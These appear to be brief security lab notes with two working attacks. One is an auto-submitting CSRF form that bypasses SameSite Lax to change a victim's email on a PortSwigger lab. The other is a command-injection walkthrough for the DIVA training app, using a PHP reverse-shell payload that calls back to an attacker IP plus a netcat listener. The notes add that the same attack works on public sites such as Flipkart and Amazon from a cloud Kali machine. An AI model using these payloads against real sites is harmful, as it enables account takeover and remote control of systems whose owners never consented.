Cyber Security | Web Development

 SameSite LAX bypass - 1. You should be change method POST to GET. 2. Add hidden POST method. <html>   <!-- CSRF PoC - generated by Burp Suite Professional -->   <body>   <script>history.pushState('', '', '/')</script>     <form action="https://0a0900a70419828cc0a45e0b00540080.web-security-academy.net/my-account/change-email" method="GET" >       <input type="hidden" name="_method" value="POST" /> <input type="hidden" name="email" value="pwned1&#64;pwned&#46;com" />       <input type="submit" value="Submit request" />     </form>     <script>       document.forms[0].submit();     </script>   </body> </html>

Command Injection Initially retrieve the Kali machine IP address via the command: ifconfig Step 1: Open the DIVA application Command Execution  exercise: Paste the following payload in the input field: google.com > junk;php -r '$sock=fsockopen(" 10.0.0.1 ",4242);exec("/bin/sh -i <&3 >&3 2>&3");' Make sure to replace your kali machine IP address. Step 2: Move to Kali machine and run the nc or (netcat) listener to run the command and wait for a moment to get a reverse connection response from the application. Note:  The above application is on the same private IP in the machine. But  for the real-time applications(flipkart,amazon) running in the public IP addresses, we need to use a cloud Kali machine based on public IP address only possible to attack the command injection. Payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md